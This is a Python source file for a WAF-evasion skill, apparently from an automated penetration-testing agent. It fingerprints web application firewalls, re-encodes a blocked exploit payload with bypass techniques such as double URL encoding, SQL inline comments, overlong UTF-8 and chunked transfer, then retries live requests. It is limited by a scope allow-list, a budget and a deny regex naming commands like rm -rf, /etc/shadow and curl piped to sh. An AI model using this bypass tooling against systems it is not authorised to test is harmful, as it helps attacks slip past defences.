#!/usr/bin/env python3
"""
run.py -- waf-evasion-mastery entry point.

The Dispatcher's adaptation handler. When an already-vetted exploit request is
blocked by a WAF (403/406/429/...), this skill fingerprints the WAF from its
response, derives a series of encoding mutations of the SAME payload, retries
them under a strict budget against IN-SCOPE hosts only, and — on the first
mutation that is no longer blocked — records the winning bypass chain to a
durable registry that every active loop can reuse.

SAFETY MODEL (safety-by-construction)
-------------------------------------
* Scope invariant. A mutation is only ever *sent* when the request host is in
  `config.scope.allowed_hosts`. No scope, host out of scope, or `dry_run` set =>
  NO live traffic: mutations are generated and returned, `bypass_successful`
  stays false, `meta.mode == "dry_run"`. Scope is a loop invariant, never
  widened here.
* Mutation budget. At most `config.mutation_budget` live retries (default 16).
  The skill stops at the first success. Every retry is counted and reported.
* Re-encode, never re-arm. This skill mutates the ENCODING of a payload it was
  handed; it does not invent new attack strings. If a benign `canary` is
  supplied it is asserted to survive every mutation (decodes back), so a bypass
  is proven with the same harmless marker the upstream skill used, never a
  weaponized one. Destructive shell/OS tokens in the incoming payload are
  refused outright.
* Custody. Cookies / auth headers are passed through for the retry but are
  hashed (never echoed) in the artifact and registry.

CONTRACT
--------
* Input  : {"blocked_request": {"url","method","payload","param","headers","body"},
            "waf_type": "cloudflare",
            "config": {"scope": {"allowed_hosts": [...]}, "mutation_budget": 16,
                       "dry_run": false, "timeout_s": 15, "canary": "..."}}
* Output : one strict JSON artifact on stdout (references/ARTIFACT_SCHEMA.md).
"""
from __future__ import annotations

import hashlib
import json
import os
import re
import sys
import time
import urllib.parse
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple

try:
    from spill_store import read_spill, write_spill
except ImportError:  # pragma: no cover
    sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
    from spill_store import read_spill, write_spill  # type: ignore

try:
    import httpx
except ImportError:  # pragma: no cover
    httpx = None

# durable, cross-loop registry (survives sessions); snapshot also spilled per run
_SPILL_DIR = os.environ.get("SPILL_STORE_DIR", "/tmp/spill_store")
WAF_REGISTRY_PATH = os.environ.get(
    "WAF_REGISTRY_PATH", os.path.join(os.path.dirname(_SPILL_DIR.rstrip("/")) or "/tmp",
                                      "waf_registry.json"))

BLOCK_STATUS = {403, 406, 429, 501, 503}
BLOCK_MARKERS = ("attention required", "access denied", "request blocked",
                 "requested url was rejected", "not acceptable", "forbidden",
                 "incapsula incident", "sucuri website firewall",
                 "generated by wordfence", "blocked by", "reference #",
                 "the request is blocked", "support id")

# an incoming payload carrying these is refused (we re-encode exploits, we do
# not relay OS/shell weaponization through the WAF layer)
DESTRUCTIVE = re.compile(
    r";\s*(rm|mkfs|dd|shutdown|reboot|halt)\b|\brm\s+-rf\b|\bmkfs\b|"
    r"\b:\(\)\s*\{|/etc/shadow\b|\bwget\s+http|\bcurl\s+http.*\|\s*sh\b", re.I)

def _now_iso() -> str:
    return datetime.now(timezone.utc).isoformat()


def _sha(s: str) -> str:
    return hashlib.sha256(s.encode("utf-8", "replace")).hexdigest()[:16]


class UnsafeRequest(Exception):
    pass


# ---------------------------------------------------------------- signatures --
def _load_signatures() -> List[dict]:
    here = os.path.dirname(os.path.abspath(__file__))
    path = os.path.join(here, "..", "assets", "waf_signatures.json")
    try:
        with open(path, "r", encoding="utf-8") as fh:
            data = json.load(fh)
        sigs = data.get("signatures", [])
        if sigs:
            return sigs
    except Exception:  # noqa: BLE001
        pass
    return [  # minimal built-in fallback
        {"waf": "cloudflare", "headers": ["cf-ray"], "server": ["cloudflare"],
         "body": ["attention required"], "block_status": [403, 429, 503]},
        {"waf": "aws-waf", "headers": ["x-amzn-errortype"], "body": ["request blocked"],
         "block_status": [403]},
        {"waf": "modsecurity", "server": ["mod_security"], "body": ["not acceptable"],
         "block_status": [406, 403]},
        {"waf": "generic", "body": ["access denied", "forbidden", "request blocked"],
         "block_status": [403, 406, 429, 501]},
    ]


# ---------------------------------------------------------------- mutations ---
def _pct(s: str, safe: str = "") -> str:
    return urllib.parse.quote(s, safe=safe)


def m_url_encode(p: str) -> str:
    return _pct(p)


def m_double_url_encode(p: str) -> str:
    return _pct(_pct(p))


def m_url_special_only(p: str) -> str:
    out = []
    for ch in p:
        if ch in " '\"<>()=;&/\\|%#":
            out.append("%{:02X}".format(ord(ch)))
        else:
            out.append(ch)
    return "".join(out)


def m_case_swap(p: str) -> str:
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))


_KEYWORDS = re.compile(
    r"\b(select|union|insert|update|delete|from|where|and|or|script|alert|"
    r"onerror|onload|img|svg|drop|concat|sleep|benchmark|load_file)\b", re.I)


def m_keyword_case(p: str) -> str:
    def sw(m: "re.Match[str]") -> str:
        w = m.group(0)
        return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(w))
    return _KEYWORDS.sub(sw, p)


def m_inline_comment(p: str) -> str:
    # MySQL versioned/inline comments between SQL keywords
    def sw(m: "re.Match[str]") -> str:
        return "/*!50000" + m.group(0) + "*/"
    injected = _KEYWORDS.sub(sw, p)
    return injected if injected != p else p.replace(" ", "/**/", 1) if " " in p else p


def m_comment_space(p: str) -> str:
    return p.replace(" ", "/**/")


def m_ws_tab(p: str) -> str:
    return _pct(p.replace(" ", "\t"))


def m_ws_newline(p: str) -> str:
    return _pct(p.replace(" ", "\n"))


_FW_OFFSET = 0xFEE0  # ASCII printable -> fullwidth


def m_unicode_fullwidth(p: str) -> str:
    out = []
    for ch in p:
        o = ord(ch)
        out.append(chr(o + _FW_OFFSET) if 0x21 <= o <= 0x7E else ch)
    return "".join(out)


def m_unicode_overlong(p: str) -> str:
    # overlong UTF-8 (2-byte) percent-encoding for a few structural chars
    over = {".": "%C0%AE", "/": "%C0%AF", "\\": "%C1%9C", "<": "%C0%BC",
            ">": "%C0%BE", "'": "%C0%A7"}
    return "".join(over.get(ch, ch) for ch in p)


# name -> encoder ; ordered cheapest/most-common first
ENCODERS: List[Tuple[str, Any]] = [
    ("url_encode", m_url_encode),
    ("double_url_encode", m_double_url_encode),
    ("url_special_only", m_url_special_only),
    ("case_swap", m_case_swap),
    ("keyword_case_swap", m_keyword_case),
    ("inline_comment", m_inline_comment),
    ("comment_space", m_comment_space),
    ("ws_tab", m_ws_tab),
    ("ws_newline", m_ws_newline),
    ("unicode_fullwidth", m_unicode_fullwidth),
    ("unicode_overlong", m_unicode_overlong),
]

# a couple of chained combos, tried after singletons
CHAINS: List[Tuple[str, List[str]]] = [
    ("keyword_case_swap+inline_comment", ["keyword_case_swap", "inline_comment"]),
    ("comment_space+double_url_encode", ["comment_space", "double_url_encode"]),
    ("case_swap+url_encode", ["case_swap", "url_encode"]),
]

_ENC_MAP = dict(ENCODERS)


def _decodes_to_canary(mutated: str, canary: str) -> bool:
    """Best-effort: does the mutation still carry the benign canary?"""
    if not canary:
        return True
    cands = {mutated}
    try:
        cands.add(urllib.parse.unquote(mutated))
        cands.add(urllib.parse.unquote(urllib.parse.unquote(mutated)))
    except Exception:  # noqa: BLE001
        pass
    lowered = " ".join(cands).lower().replace("/**/", " ").replace("/*!50000", "")
    return canary.lower() in lowered


class WAFEvasion:
    def __init__(self, blocked_request: dict, waf_type: str = "", config: Optional[dict] = None):
        self.req = blocked_request or {}
        self.declared_waf = (waf_type or "").lower().strip()
        self.config = config or {}
        self.budget = int(self.config.get("mutation_budget", 16))
        self.timeout_s = float(self.config.get("timeout_s", 15))
        self.canary = str(self.config.get("canary", "") or "")
        self.dry_run = bool(self.config.get("dry_run", False))
        self.scope = self.config.get("scope", {}) or {}
        self.allowed = [h.lower() for h in self.scope.get("allowed_hosts", [])]
        self.errors: List[Dict[str, str]] = []
        self.attempts: List[Dict[str, Any]] = []
        self.url = self.req.get("url", "")
        self.method = (self.req.get("method") or "GET").upper()
        self.payload = self.req.get("payload", "")
        self.param = self.req.get("param", "")
        self.signatures = _load_signatures()

    # -- scope --------------------------------------------------------------
    def _host(self) -> str:
        try:
            return (urllib.parse.urlsplit(self.url).hostname or "").lower()
        except Exception:  # noqa: BLE001
            return ""

    def _in_scope(self) -> bool:
        h = self._host()
        if not h or not self.allowed:
            return False
        return any(h == a or h.endswith("." + a) for a in self.allowed)

    def _live_ok(self) -> bool:
        return (not self.dry_run) and self._in_scope() and httpx is not None

    # -- signature ----------------------------------------------------------
    def analyze_signature(self, headers: Optional[dict] = None, body: str = "",
                          status: Optional[int] = None) -> str:
        hdrs = {str(k).lower(): str(v).lower() for k, v in (headers or {}).items()}
        server = hdrs.get("server", "")
        setck = hdrs.get("set-cookie", "")
        blob = (body or "").lower()
        best = self.declared_waf or ""
        for sig in self.signatures:
            if sig["waf"] == "generic":
                continue
            hit = False
            for h in sig.get("headers", []):
                if h.lower() in hdrs:
                    hit = True
            for s in sig.get("server", []):
                if s.lower() in server:
                    hit = True
            for c in sig.get("cookies", []):
                if c.lower() in setck:
                    hit = True
            for b in sig.get("body", []):
                if b.lower() in blob:
                    hit = True
            if hit:
                return sig["waf"]
        return best or "unknown"

    @staticmethod
    def _is_blocked(status: int, body: str) -> bool:
        if status in BLOCK_STATUS:
            return True
        low = (body or "").lower()
        return any(m in low for m in BLOCK_MARKERS)

    # -- mutation -----------------------------------------------------------
    def mutate_payload(self) -> List[Tuple[str, str]]:
        """Return ordered [(encoding_name, mutated_payload)] candidates."""
        seen: set = set()
        out: List[Tuple[str, str]] = []
        base = self.payload

        def add(name: str, val: str):
            if not val or val == base:
                return
            if not _decodes_to_canary(val, self.canary):
                return
            key = _sha(val)
            if key in seen:
                return
            seen.add(key)
            out.append((name, val))

        for name, fn in ENCODERS:
            try:
                add(name, fn(base))
            except Exception as exc:  # noqa: BLE001
                self.errors.append({"stage": f"mutate:{name}", "error": str(exc)})
        for name, chain in CHAINS:
            try:
                val = base
                for step in chain:
                    val = _ENC_MAP[step](val)
                add(name, val)
            except Exception as exc:  # noqa: BLE001
                self.errors.append({"stage": f"mutate:{name}", "error": str(exc)})
        return out

    # -- retry --------------------------------------------------------------
    def _apply_to_request(self, mutated: str) -> Tuple[str, Optional[str]]:
        """Return (url, body) with the mutated payload placed in param or body."""
        url, body = self.url, self.req.get("body")
        if self.param:
            parts = urllib.parse.urlsplit(url)
            q = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
            if self.param in q or self.method == "GET":
                q[self.param] = mutated
                url = urllib.parse.urlunsplit(
                    (parts.scheme, parts.netloc, parts.path,
                     urllib.parse.urlencode(q, safe="%/*!"), parts.fragment))
            elif isinstance(body, str):
                body = body.replace(urllib.parse.quote(self.payload), mutated) \
                    if self.payload in body else body + f"&{self.param}={mutated}"
        elif isinstance(body, str) and self.payload and self.payload in body:
            body = body.replace(self.payload, mutated)
        elif self.method == "GET" and self.payload and self.payload in url:
            url = url.replace(self.payload, mutated)
        return url, body

    def retry_request(self, name: str, mutated: str, chunked: bool = False) -> Dict[str, Any]:
        url, body = self._apply_to_request(mutated)
        headers = dict(self.req.get("headers", {}) or {})
        rec: Dict[str, Any] = {"encoding": name, "chunked": chunked}
        if not self._live_ok():
            rec.update({"sent": False, "reason": "dry_run/out_of_scope"})
            return rec
        try:
            kwargs: Dict[str, Any] = {"headers": headers, "timeout": self.timeout_s}
            if chunked and body is not None:
                def _gen(b=body):
                    data = b.encode() if isinstance(b, str) else b
                    mid = max(1, len(data) // 2)
                    yield data[:mid]
                    yield data[mid:]
                headers["Transfer-Encoding"] = "chunked"
                kwargs["content"] = _gen()
            elif body is not None:
                kwargs["content"] = body.encode() if isinstance(body, str) else body
            with httpx.Client(verify=True, follow_redirects=False) as cli:
                resp = cli.request(self.method, url, **kwargs)
            text = resp.text[:4000]
            blocked = self._is_blocked(resp.status_code, text)
            rec.update({"sent": True, "status": resp.status_code, "blocked": blocked,
                        "waf_now": self.analyze_signature(dict(resp.headers), text, resp.status_code)})
            return rec
        except Exception as exc:  # noqa: BLE001
            rec.update({"sent": True, "error": str(exc)})
            self.errors.append({"stage": f"retry:{name}", "error": str(exc)})
            return rec

    # -- registry -----------------------------------------------------------
    def _load_registry(self) -> dict:
        try:
            with open(WAF_REGISTRY_PATH, "r", encoding="utf-8") as fh:
                return json.load(fh)
        except Exception:  # noqa: BLE001
            return {"version": "1.0", "chains": {}, "updated_at": ""}

    def update_registry(self, waf: str, encoding: str, mutated: str) -> str:
        reg = self._load_registry()
        chains = reg.setdefault("chains", {})
        entry = chains.setdefault(waf, {})
        rec = entry.setdefault(encoding, {"hits": 0, "example_hash": "", "first_seen": _now_iso()})
        rec["hits"] += 1
        rec["example_hash"] = _sha(mutated)
        rec["last_seen"] = _now_iso()
        reg["updated_at"] = _now_iso()
        try:
            os.makedirs(os.path.dirname(WAF_REGISTRY_PATH) or ".", exist_ok=True)
            tmp = WAF_REGISTRY_PATH + ".tmp"
            with open(tmp, "w", encoding="utf-8") as fh:
                json.dump(reg, fh, indent=2, sort_keys=True)
            os.replace(tmp, WAF_REGISTRY_PATH)
        except Exception as exc:  # noqa: BLE001
            self.errors.append({"stage": "registry_write", "error": str(exc)})
        return write_spill(reg)  # snapshot for the Observer

    # -- orchestration ------------------------------------------------------
    def run(self) -> dict:
        started = time.time()
        if not self.payload or not self.url:
            return self._artifact(False, "", "", "", "missing url/payload")
        if DESTRUCTIVE.search(self.payload):
            return self._artifact(False, "", "", "",
                                  "refused: destructive OS/shell token in payload")

        waf = self.analyze_signature(self.req.get("waf_response_headers"),
                                     self.req.get("waf_response_body", ""),
                                     self.req.get("waf_status")) or "unknown"
        candidates = self.mutate_payload()

        live = self._live_ok()
        winner_enc, winner_payload = "", ""
        sent = 0
        if live:
            for name, mutated in candidates:
                if sent >= self.budget:
                    break
                sent += 1
                rec = self.retry_request(name, mutated)
                self.attempts.append(rec)
                if rec.get("sent") and not rec.get("blocked") and "error" not in rec:
                    winner_enc, winner_payload = name, mutated
                    break
            # one transport-level attempt (chunked) if still blocked and budget remains
            if not winner_enc and sent < self.budget and self.req.get("body"):
                sent += 1
                rec = self.retry_request("chunked_transfer", self.payload, chunked=True)
                self.attempts.append(rec)
                if rec.get("sent") and not rec.get("blocked") and "error" not in rec:
                    winner_enc, winner_payload = "chunked_transfer", self.payload

        registry_spill = ""
        if winner_enc:
            registry_spill = self.update_registry(waf, winner_enc, winner_payload)

        cand_spill = write_spill({"waf": waf, "candidates":
                                  [{"encoding": n, "payload": m} for n, m in candidates]})
        return self._artifact(bool(winner_enc), winner_enc, winner_payload, registry_spill,
                              "" if winner_enc or not live else "all mutations still blocked",
                              waf=waf, sent=sent, candidates=len(candidates),
                              cand_spill=cand_spill, mode="live" if live else "dry_run",
                              elapsed=round(time.time() - started, 3))

    def _artifact(self, ok: bool, encoding: str, mutated: str, registry_spill: str,
                  note: str = "", **extra) -> dict:
        headers = self.req.get("headers", {}) or {}
        cred = ""
        for k in ("authorization", "cookie", "x-api-key"):
            for hk, hv in headers.items():
                if str(hk).lower() == k and hv:
                    cred = _sha(str(hv))
        art = {
            "bypass_successful": ok,
            "effective_encoding": encoding,
            "mutated_payload": mutated,
            "registry_spill_id": registry_spill,
            "meta": {
                "skill": "waf-evasion-mastery", "version": "1.0", "phase": "6",
                "loop_component": "4-dispatcher",
                "status": "ok",
                "generated_at": _now_iso(),
                "waf": extra.get("waf", ""),
                "mode": extra.get("mode", "dry_run"),
                "in_scope": self._in_scope(),
                "requests_sent": extra.get("sent", 0),
                "mutation_budget": self.budget,
                "candidates_generated": extra.get("candidates", 0),
                "candidates_spill_id": extra.get("cand_spill", ""),
                "attempts": self.attempts,
                "credential_hash": cred,
                "canary_enforced": bool(self.canary),
                "note": note,
            },
            "errors": self.errors,
        }
        return art


# --- entry point -------------------------------------------------------------
def _load_input(argv: List[str]) -> dict:
    raw = ""
    if len(argv) > 1 and argv[1].strip():
        raw = argv[1]
    elif not sys.stdin.isatty():
        raw = sys.stdin.read()
    raw = raw.strip()
    if not raw:
        raise ValueError('no input: expected JSON {"blocked_request": {...}}')
    obj = json.loads(raw)
    if not isinstance(obj, dict):
        raise ValueError("input must be a JSON object")
    return obj


def _error_artifact(msg: str) -> dict:
    return {"bypass_successful": False, "effective_encoding": "", "mutated_payload": "",
            "registry_spill_id": "",
            "meta": {"skill": "waf-evasion-mastery", "version": "1.0", "phase": "6",
                     "status": "error", "generated_at": _now_iso(), "mode": "error"},
            "errors": [{"stage": "init", "error": msg}]}


def main() -> int:
    try:
        payload = _load_input(sys.argv)
    except Exception as exc:  # noqa: BLE001
        print(json.dumps(_error_artifact(f"input error: {exc}")))
        return 2
    br = payload.get("blocked_request")
    if not isinstance(br, dict) or not br.get("url"):
        print(json.dumps(_error_artifact("need blocked_request.url")))
        return 2
    ev = WAFEvasion(br, payload.get("waf_type", ""), config=payload.get("config"))
    print(json.dumps(ev.run(), ensure_ascii=False))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
